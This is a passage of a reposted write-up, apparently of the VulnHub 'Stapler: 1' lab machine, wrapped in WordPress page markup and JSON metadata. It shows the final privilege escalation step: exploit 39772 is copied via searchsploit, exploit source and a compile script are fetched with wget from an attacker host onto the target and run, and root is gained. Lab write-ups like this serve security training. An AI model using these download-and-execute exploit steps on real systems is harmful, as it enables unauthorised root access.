title=\"VulnHub: STAPLER: 1\u63d2\u56fe142\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe142\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/2805\/1*hYPJuVDnOqyDtjEXfftJUw.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*hYPJuVDnOqyDtjEXfftJUw.png 276w, https:\/\/miro.medium.com\/max\/828\/1*hYPJuVDnOqyDtjEXfftJUw.png 552w, https:\/\/miro.medium.com\/max\/960\/1*hYPJuVDnOqyDtjEXfftJUw.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*hYPJuVDnOqyDtjEXfftJUw.png 700w\" width=\"1870\" height=\"516\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe143\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe143\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"c948\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Copy and read it<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"34fb\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">searchsploit -m 39772<\/span><span id=\"bff2\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">cat 39772.txt<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ama\">\n<div class=\"kc s ao kd\">\n<div class=\"amb kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/42\/1*bz_b2KOjVbx4zrkOE0LI1Q.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"766\" height=\"812\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe144\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe144\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1149\/1*bz_b2KOjVbx4zrkOE0LI1Q.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*bz_b2KOjVbx4zrkOE0LI1Q.png 276w, https:\/\/miro.medium.com\/max\/828\/1*bz_b2KOjVbx4zrkOE0LI1Q.png 552w, https:\/\/miro.medium.com\/max\/960\/1*bz_b2KOjVbx4zrkOE0LI1Q.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*bz_b2KOjVbx4zrkOE0LI1Q.png 700w\" width=\"766\" height=\"812\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe145\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe145\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"6b3a\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">I followed the provided link.<\/p>\n<div class=\"hc hd he hf hg hh\">\n<div class=\"hi n ab\">\n<div class=\"hj n ak p hk hl\">\n<h2 class=\"ba cz dn bc hm hn ho hp hq hr hs dk gj\">808 - project-zero - Project Zero - Monorail<\/h2>\n<div class=\"ht s\">\n<h3 class=\"ba b dn bc hm hn ho hp hq hr hs by\">Edit description<\/h3>\n<\/div>\n<div class=\"hu s\">\n<p class=\"ba b hv bc hm hn ho hp hq hr hs by\">bugs.chromium.org<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<p id=\"624a\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">I got the exploit file.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev amc\">\n<div class=\"kc s ao kd\">\n<div class=\"amd kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*hTufYQi4acEy6QeKoyUWkQ.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1045\" height=\"236\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe146\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe146\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1568\/1*hTufYQi4acEy6QeKoyUWkQ.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*hTufYQi4acEy6QeKoyUWkQ.png 276w, https:\/\/miro.medium.com\/max\/828\/1*hTufYQi4acEy6QeKoyUWkQ.png 552w, https:\/\/miro.medium.com\/max\/960\/1*hTufYQi4acEy6QeKoyUWkQ.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*hTufYQi4acEy6QeKoyUWkQ.png 700w\" width=\"1045\" height=\"236\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe147\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe147\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"dd55\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Decompressed<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"2b28\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">tar -xvf exploit.tar<\/span><\/pre>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev ame\">\n<div class=\"kc s ao kd\">\n<div class=\"amf kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*hzrRUBM3LCnrxGKgsRZjDA.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"702\" height=\"165\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe148\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe148\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1053\/1*hzrRUBM3LCnrxGKgsRZjDA.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*hzrRUBM3LCnrxGKgsRZjDA.png 276w, https:\/\/miro.medium.com\/max\/828\/1*hzrRUBM3LCnrxGKgsRZjDA.png 552w, https:\/\/miro.medium.com\/max\/960\/1*hzrRUBM3LCnrxGKgsRZjDA.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*hzrRUBM3LCnrxGKgsRZjDA.png 700w\" width=\"702\" height=\"165\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe149\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe149\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<p id=\"4e13\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Download to target machine.<\/p>\n<pre class=\"je jf jg jh ji jj jk jl\"><span id=\"c8e2\" class=\"gj jm jn fn jo b dn jp jq s jr\" data-selectable-paragraph=\"\">wget http:\/10.0.2.32\/hello.c<\/span><span id=\"4334\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">wget http:\/10.0.2.32\/suidhelper.c<\/span><span id=\"441c\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">wget http:\/10.0.2.32\/doubleput.c<\/span><span id=\"7b3e\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">wget http:\/10.0.2.32\/compile.sh<\/span><span id=\"d47d\" class=\"gj jm jn fn jo b dn kj kk kl km kn jq s jr\" data-selectable-paragraph=\"\">.\/compile.sh<\/span><\/pre>\n<p id=\"a003\" class=\"id ie fn if b ig ih ii ij ik il im in io ip iq ir is it iu iv iw ix iy iz ja dm gj\" data-selectable-paragraph=\"\">Now, I\u2019m root.<\/p>\n<figure class=\"je jf jg jh ji jt eu ev paragraph-image\">\n<div class=\"ju jv ao jw w jx\" tabindex=\"0\" role=\"button\">\n<div class=\"eu ev amg\">\n<div class=\"kc s ao kd\">\n<div class=\"amh kf s\">\n<div class=\"ej jy fd em ei jz w hm ka kb\"><img loading=\"lazy\" decoding=\"async\" class=\"fd em ei jz w kg kh af zm\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/45\/1*vPs-7MyCiLkHtSVSpDZj2A.png?q=20\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" width=\"1101\" height=\"656\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe150\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe150\" \/><\/div>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"pn wz fd em ei jz w c\" role=\"presentation\" data-original=\"https:\/\/miro.medium.com\/max\/1652\/1*vPs-7MyCiLkHtSVSpDZj2A.png\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" sizes=\"auto, 700px\" srcset=\"https:\/\/miro.medium.com\/max\/414\/1*vPs-7MyCiLkHtSVSpDZj2A.png 276w, https:\/\/miro.medium.com\/max\/828\/1*vPs-7MyCiLkHtSVSpDZj2A.png 552w, https:\/\/miro.medium.com\/max\/960\/1*vPs-7MyCiLkHtSVSpDZj2A.png 640w, https:\/\/miro.medium.com\/max\/1050\/1*vPs-7MyCiLkHtSVSpDZj2A.png 700w\" width=\"1101\" height=\"656\" title=\"VulnHub: STAPLER: 1\u63d2\u56fe151\" alt=\"VulnHub: STAPLER: 1\u63d2\u56fe151\" \/><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/figure>\n<\/div>\n<\/div>\n<\/section>\n<\/article>\n<div class=\"pn fh ek ob w xb em nz ym\" data-test-id=\"post-sidebar\">\n<div class=\"n p\">\n<div class=\"ap aq ar as at au av w\">\n<div class=\"yn n ak\">\n<div class=\"abj\">\n<div>\n<div class=\"yo s\">\n<div class=\"oh s\"><\/div>\n<div class=\"oi s\"><\/div>\n<\/div>\n<div class=\"qx yr n ax ys\">\n<div class=\"op oq yt yu n\">\n<div class=\"n o\">\n<div class=\"s ao or os ot ou ov\">\n<div class=\"ce ow ox oy oz pa pb vv r pd pe\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"op az s\">\n<div class=\"po n o ax\">\n<div class=\"s ao pp pq pr ps pt pu pv pw\"><\/div>\n<\/div>\n<\/div>\n<div class=\"wx\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"pn abj nu ek nv nw nx ny nz oa\"><\/div>\n<div>\n<div class=\"px jt n ak p\">\n<div class=\"n p\">\n<div class=\"ap aq ar as at fl av w\">\n<div class=\"n ct\"><\/div>\n<div class=\"n o ct\"><\/div>\n<div class=\"py px s\">\n<div class=\"pz n cj gz\">\n<div class=\"n o ax\">\n<div class=\"qa s\">\n<div class=\"n o\">\n<div class=\"s ao or os ot ou ov\">\n<div class=\"ce ow ox oy oz pa pb vv r pd pe\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"s qh qi qj qk ql\"><\/div>\n<div class=\"po n o ax\">\n<div class=\"s ao qo pq qp ps qq pu qr qs qt qu\"><\/div>\n<\/div>\n<\/div>\n<div class=\"n o\">\n<div class=\"ha s\">\n<div class=\"bv\" aria-hidden=\"false\" aria-describedby=\"postFooterSocialMenu\" aria-labelledby=\"postFooterSocialMenu\">\n<div>\n<div class=\"bv\" role=\"tooltip\" aria-hidden=\"false\" aria-describedby=\"98\" aria-labelledby=\"98\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"ha s ab\">\n<div class=\"wx\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>VulnHub: STAPLER: 1 Apr 9\u00b710 min read Link: https:\/\/www [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[608,607,600],"class_list":["post-1081","post","type-post","status-publish","format-standard","hentry","category-net-security","tag-vuln","tag-vulnerable","tag-vulnhub"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/1081","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1081"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/1081\/revisions"}],"wp:attachment":[{"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1081"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1081"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1081"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}